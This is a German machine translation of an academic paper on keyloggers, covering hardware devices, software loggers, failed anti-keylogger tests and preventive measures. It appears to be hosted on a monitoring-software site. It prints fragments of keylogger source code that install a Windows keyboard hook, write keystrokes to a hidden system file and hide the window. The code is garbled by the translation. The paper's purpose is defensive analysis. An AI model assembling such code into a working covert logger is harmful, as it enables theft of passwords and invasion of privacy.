This is a machine translation. The original page (in English) is available here.
Windows
Mac OS
Mobile

Neueste news: September 19th, 2016 - Wir haben Hinzugefügt, neue Kategorien für die überwachung der Produkte Test: Mikrofon-und Webcam-Aufnahmen, usw... RSS-Feed

Home>Artikel>Tasten-Rekorder: Die Übersehene Bedrohung für Computer-Sicherheit

AnyKeylogger für Mac

Tasten-Rekorder: Die Übersehene Bedrohung für Computer-Sicherheit

von Kishore Subramanyam, Charles E. Frank, Donald F. Galli

Kishore Subramanyam, Charles E. Frank, Donald H. Galli
Fachbereich Mathematik und informatik
Northern Kentucky Universität
Highland Heights, KY 41099
{subramanyamk, frank, [email protected]

ABSTRACT

Keylogger hardware oder software, die Tastatureingaben aufzeichnen. Sie stellen eine ernsthafte Bedrohung für die Privatsphäre der computer-Nutzer. Wir installiert und getestet, verschiedene Tasten-Rekorder und untersucht keylogger-code. Wir haben auch überprüft, was bekannt ist über Tasten-Rekorder, vor allem aus Internet-Quellen. Dieses Papier bietet eine Analyse der Mechanismen, die Tasten-Rekorder verwenden und warum ist die Erkennung schwierig. Wir bieten mehrere Empfehlungen über die Schritte computer-Nutzer sollten zu nehmen.

1. EINFÜHRUNG

Keylogger zeichnen jeden Tastendruck ein computer-Benutzer macht. Sie vertrieben werden, zur überwachung der computer-Nutzung von Kindern oder zu fangen ein Betrug Ehepartner. Sie werden verwendet, um zu stehlen, Kreditkarten-und Kontonummern, Benutzernamen und Kennwörter. Sie werden auch verwendet, zu überwachen Mitarbeiter.

Tasten-Rekorder installiert werden kann, indem er physikalischen Zugriff auf die computer oder Programme heruntergeladen. Ihre kleinen Fußabdruck in Bezug auf Speicher-und Prozessorauslastung macht Sie praktisch unauffindbar. Tasten-Rekorder können per E-Mail oder ftp die Datei mit Tastatureingaben zurück, um eine Spionage-person.

Keylogger erhalten nicht die gleiche Aufmerksamkeit wie Viren und Würmer. Der standard-Referenz auf Viren, Würmer und trojanische Pferde [4] widmet einen Absatz zu Keyloggern. Unter computer-security-Bücher, [2] kaum erwähnt Tasten-Rekorder und [1] und [9] erwähnen Sie nicht an allen.

Zwei aktuelle Beispiele verdeutlichen die Gefahr durch Tasten-Rekorder. Im Februar 2003, David Boudreau, einem Boston College-student, der beauftragt wurde mit der Installation von Keyloggern auf eine mehr als 100-Universität Computern [10]. Er verwendet Informationen über die Fakultät, Studenten und Mitarbeiter zu stehlen von $2.000. Im Juli 2003, Juju Jiang bekannte sich schuldig, um die Installation von Keyloggern in zwanzig Kinko ' s stores in New York [7]. Er aus der Ferne erfasst Tastatureingaben und hatte zu stehlen Benutzernamen und Kennwörter für zwei Jahre, bevor er gefangen war.

2. HARDWARE-KEYLOGGER

Hardware-Keylogger kommen in verschiedenen Formen und Formen. Sie können eine externe Anlage zwischen der Tastatur und dem Hafen. Diese sind ein Stück Kabel mit einem kleinen Zylinder in Farben, um die Tastatur-Kabel. Sie nehmen weniger als eine minute zu installieren. Seit Sie befinden sich auf der Rückseite des Computers, sind Sie schwer zu erkennen. Auch hardware-Keylogger kann ein Gerät platziert im inneren des Gerätes, neben dem Tastatur-port oder im inneren der Tastatur selbst. Diese Geräte physisch unsichtbar auf dem computer des Benutzers.

Viele Hersteller verkaufen hardware-Keylogger. Wir testeten die $99 KeyGhost Std mit 512K flash-Speicher [5]. Im Gegensatz zu unseren Erwartungen, die Windows nicht erkennt die KeyGhost befestigt, die zwischen der Tastatur und das I/O-port als ein neues Gerät, noch haben zeigen, bis in der Geräteliste.

3. SOFTWARE-KEYLOGGER

Eine Vielzahl von Keyloggern finden, indem Sie nach "keylogger" mit Hilfe einer Suchmaschine. Software-Keylogger können auch kostenlos heruntergeladen werden von jedem keylogger-forum [3]. Für dieses Projekt haben wir versucht, sowohl kommerzielle als auch freie-software-Keylogger.

Ein software-keylogger installiert werden kann auf einem Rechner mit Administrator-Berechtigungen. Sie kommen in verschiedenen Formen. Ein Tasten-Rekorder kann eine ausführbare Datei in Visual Basic geschrieben. Es kann ein Gerätetreiber, der ersetzt den vorhandenen I/O-Treiber mit eingebetteten key-logging-Funktionalität. Am häufigsten, Tasten-Rekorder geschrieben in C/C++ mithilfe von Windows-hooks.

Wir haben getestet, Raytown, Ghost, Amecisco, KmInt21 software-Keylogger. Jeder von Ihnen arbeitete anders, aber das Endergebnis war das gleiche. Sie protokolliert Tastatureingaben und Mausklicks und schrieb Sie in eine Datei. Sie hatten die Möglichkeit, die Verschlüsselung und Entschlüsselung der log-Dateien und die Möglichkeit, das senden der Datei an ein Ziel, über das Internet.

Keiner von Ihnen zeigte sich in der Task-Manager oder in der Liste der Prozesse. Der Tasten-Rekorder log-Dateien versteckt waren. Diese log-Dateien waren schwer zu unterscheiden von Betriebssystem-Dateien, auch wenn
dabei eine Verzeichnis-Auflistung versteckter Dateien.

4. ANTI-KEYLOGGER

Anti-Keylogger-software, die vorgibt, erkennen Tasten-Rekorder. Wir installiert und getestet Raytown und Spydex anti-Keylogger. Die anti-Keylogger nicht erkennen eines der software-Keylogger oder die KeyGhost hardware-keylogger. Die einzige Ausnahme war der Raytown anti-keylogger entdeckt seine eigenen Raytown Tasten-Rekorder. Der Grund dafür ist, dass es viele Möglichkeiten für Tasten-Rekorder zu arbeiten und sich verstecken.

Diskussionsforen im Internet [3] beachten Sie, dass anti-Keylogger erkennen, dass viele Tasten-Rekorder haben eine sehr hohe rate der false positives. Diese anti-Keylogger-monitor-Programme mit dem Windows-Haken und Haken sind rechtmäßig verwendet, um viele Funktionen.

5. WINDOWS HOOKS

Ein Windows-hook - [3, 8] ist der Kern von vielen Keyloggern. Ein hook ist ein Punkt in der system-message-handling-Mechanismus, wo eine Anwendung installieren, können Sie eine Prozedur zum abfangen von message-Verkehr, bevor es erreicht eine Ziel-Fenster-Prozedur. Ein hook-Prozedur hat den folgenden Prototyp.

LRESULT CALLBACK HookProc( 
int nCode, // gibt die Aktion an, die durchgeführt werden
WPARAM wParam, // parameter abhängig von nCode
LPARAM lParam // parameter abhängig von nCode
);


Ein Haken-Kette ist eine Liste von Zeigern auf hook-Prozeduren. Wenn eine Meldung Auftritt, die verbunden ist mit einer bestimmten Art von Haken, übergibt das system die Nachricht an jede hook-Prozedur verwiesen, die in der hook-Kette, eine nach der anderen.

Ein hook-Prozedur kann zu überwachen oder zu ändern, eine Nachricht, die durch einen Haken-Kette. Es kann auch verhindern, dass die Nachricht vom erreichen der nächsten hook-Prozedur oder das Ziel-Fenster-Prozedur.

Die SetWindowsHookEx Funktion installiert eine anwendungsdefinierte hook-Prozedur zu Beginn der Haken-Kette. Es hat die folgenden Funktions-Prototyp:

HHOOK SetWindowsHookEx(
int idHook, // gibt den hook-Typ
HOOKPROC lpfn, // Zeiger auf die hook-Prozedur
HINSTANCE hMod, // Zeiger auf dll mit der hook-Prozedur
DWORD dwThreadId // id des zugehörigen thread
);


Wir prüfen den Quellcode von mehreren Tasten-Rekorder gefunden [6]. Wenn man lernt, wie man den Windows-hooks, Tasten-Rekorder sind nicht schwer zu schreiben. Sie brauchen nicht viel code.

Hier ist die InstallHook Funktion von einem der Tasten-Rekorder. Es ordnet die log-Datei und installiert die Tastatur-logging-Verfahren KeyboardProc in der hook-Kette durch den Aufruf von SetWindowsHookEx.

BOOL WINAPI InstallHook(BOOL overwrite)
{
wenn(überschreiben) // überschreibt die log-Datei?
{
SetFileAttributes((LPCTSTR)mit dem Namen,
FILE_ATTRIBUTE_ARCHIVE);
f1 = fopen(filename, "w");
fclose(f1);
}
// setzen des "hidden" - Eigenschaft für die log-Datei
SetFileAttributes((LPCTSTR)mit dem Namen,
FILE_ATTRIBUTE_HIDDEN|
FILE_ATTRIBUTE_SYSTEM);
// rufen Sie win-API zu installieren Haken
hkb = SetWindowsHookEx(WH_KEYBOARD,
(HOOKPROC)KeyboardProc,hInstance,0);
return TRUE;
}


6. DIE WH_KEYBOARD HAKEN

Von den fünfzehn verschiedenen hook-Typen, WH_KEYBOARD und WH_MOUSE sind wichtig für das schreiben ein Tasten-Rekorder. Wir beschreiben die WH_KEYBOARD Haken geben. Die WH_KEYBOARD hook ermöglicht einer Anwendung zur überwachung von Nachrichtenverkehr für die WM_KEYDOWN - und WM_KEYUP - Nachrichten werden zurückgegeben, indem die GetMessage oder PeekMessage Funktionen. Dieser Haken kann verwendet werden, zu überwachen, Tastatur-Eingaben geschrieben, um eine message-queue über die KeyboardProc hook-Prozedur. Das Betriebssystem ruft diese Prozedur auf, wenn eine Anwendung ruft die GetMessage oder PeekMessage Funktion und es ist eine Tastatur-Nachricht (WM_KEYUP oder WM_KEYDOWNverarbeitet werden. Es hat die folgenden Funktions-Prototyp:

LRESULT CALLBACK KeyboardProc(
int code, // gibt an, wie um eine Nachricht zu verarbeiten
WPARAM wParam, // virtual-key-code-Schlüssel generieren Nachricht
LPARAM lParam // Anzahl der Wiederholungen, scan-code, erweitert-Schlüssel-flag,
// Kontext-code, zurück-Taste-Status-flag
// und transition-state flag
);


Hier ist der code von KeyboardProc von einem der Tasten-Rekorder. Es öffnet sich die log-Datei und schreibt den Charakter. Wenn nötig, ruft es die ToAscii - Funktion übersetzt die angegebene virtueller Tastencode und Tastaturstatus, um das entsprechende Zeichen oder Zeichen.

LRESULT WINAPI CALLBACK KeyboardProc(
int nCode, WPARAM wParam,
LPARAM lParam)
{
char ch;
char locname[80];
strcpy(locname, "Dateiname");
if (((DWORD)lParam & 0x40000000
&&(HC_ACTION==nCode -))
{
if((wParam==VK_SPACE)||
(wParam==VK_RETURN)||
(wParam>=0x2f ) &&
(wParam<=0x100))
{
f1=fopen(locname,"a+");
if (wParam==VK_RETURN)
{
ch='\n';
// kopiere Zeichen in log-Datei
fwrite(&ch,1,1,f1);
}
sonst
{
// array erhält den status Daten für jede virtuelle Taste
BYTE ks[256];
GetKeyboardState(ks);
WORD w;
UINT-scan;
scan=0;
ToAscii(wParam,scan,
ks&w,0);
ch =char(w);
// kopiere Zeichen in log-Datei
fwrite(&ch,1,1,f1);
}
fclose(f1);
}
}
LRESULT RetVal = CallNextHookEx(
hkb, nCode, wParam, lParam );
return RetVal;
}


Wenn ein Ereignis Auftritt, wird überwacht von einer bestimmten Art von Haken, das Betriebssystem ruft die Prozedur am Anfang der hook-Kette. Jede hook-Prozedur in der Kette bestimmt, ob das übergeben des Ereignisses an die nächste Prozedur. Ein hook-Prozedur übergibt ein Ereignis an das nächste Verfahren durch aufrufen der CallNextHookEx Funktion.

7. AUSBLENDEN DER Tasten-Rekorder

Es gibt viele Möglichkeiten, sich zu verstecken eine laufende Tasten-Rekorder zu zeigen, bis in den task-manager oder die Liste der Prozessoren. Hier ist ein Weg, um es zu verbergen, indem Sie die Eröffnung eines verborgenen Fensters auf start-up-und Einstellung der erforderlichen Parameter.

WNDCLASSEX wincl;
wincl.hInstance = hInstance;
wincl.lpszClassName = name;
wincl.lpfnWndProc = WndProc;
// Alle Fenster Eigenschaften null.
// Hier wird das Fenster unsichtbar.
wincl.style = 0;
wincl.cbSize = sizeof(WNDCLASSEX);
wincl.hIcon = NULL;
wincl.hIconSm = NULL;
wincl.hCursor = NULL;
wincl.lpszMenuName = NULL;
wincl.cbClsExtra = 0;
wincl.cbWndExtra = 0;
wincl.hbrBackground = 0;
wincl.lpszMenuName = NULL;
if(!RegisterClassEx(&wincl)) return 0;
// Alle Parameter anzeigen
/ / e.g Höhe und Breite) gleich null.
// Das macht es unsichtbar von der Taskleiste
hwnd = CreateWindowEx(0,(LPCTSTR)name,"",
0,0,0,0,0,HWND_DESKTOP,NULL,
hInstance,NULL);
ShowWindow(hwnd,SW_HIDE);


8. VORBEUGENDE MAßNAHMEN

Wir haben festgestellt, dass Tasten-Rekorder sind praktisch unmöglich, zu verfolgen, nachdem es installiert wurde. Allerdings gibt es mehrere vorbeugende Maßnahmen, die ergriffen werden können.
1. Die meisten Windows-Benutzer mit eingeschränkten Berechtigungen, indem Sie Teil der User-Gruppe.
2. Der Administrator Gruppe sollten nur sehr wenige Personen, und Sie sollten über eine starke Passwort-policy.
3. Niemand sollte jemals eine Verbindung zum Internet oder auch im internen Netzwerk beim einloggen in den computer als administrator an. Diese gibt Netzwerk Lauscher carte blanche der Zugang zur Maschine und die Möglichkeit zur Remote-Installation von software.
4. Die computer-Tastatur-Anschluss sollten überprüft werden, um zu sehen, ob ein hardware-keylogger angebracht wird.

9. FAZIT

Tasten-Rekorder sind einfach zu schreiben und einfach zu installieren. Sie sind leicht erworben durch das surfen im Internet [3, 6] oder gekauft werden können, zu einem bescheidenen Preis. Anti-Keylogger sind unwirksam. Das beste, was getan werden kann, um zu verhindern, dass key-logging zu treffen, gute Sicherheit Praktiken und zum durchführen von physikalischen Prüfungen für hardware Tasten-Rekorder.

10. REFERENZEN

[1] Cole, Eric, Hackers Beware, New Riders Publishing, 2002.

[2] Garfinkel, S., Spafford, G., und Schwartz, A., Practical Unix & Internet Security, O ' Reilly & Associates, 3. Auflage, 2003.

[3] Google-Gruppen, http://www.google.com/groups

[4] Grimes, Roger A., Malicious Mobile Code, O ' Reilly & Associates, 2001, (S. 190).

[5] Keyghost, http://www.keyghost.com

[6] Keylogger-source-code, http://www.planetsourcecode.com

[7] "Kinko' s spyware-Fall zeigt die Gefahr der öffentlichen Internet-terminals",
http://www.siliconvalley.com/mld/siliconvalley/news/6359407.htm

[8] Microsoft developer network, http://msdn.Microsoft.com

[9] Pfleeger, C. Pfleeger, S.,Security in Computing, 3. Auflage, Prentice Hall, 2003.

[10] "Student berechnet nach dem college-Computer gehackt", http://www.xatrix.org/article2641.html
Lesen Sie den vollständigen Artikel
Home>Artikel>Tasten-Rekorder: Die Übersehene Bedrohung für Computer-Sicherheit
WICHTIG!!!! Installation von computer-monitoring-tools auf Computern, die Sie nicht besitzen oder haben keine Berechtigung zum monitor kann gegen lokale, Staatliche oder bundesstaatliche Gesetz.
Suggest translation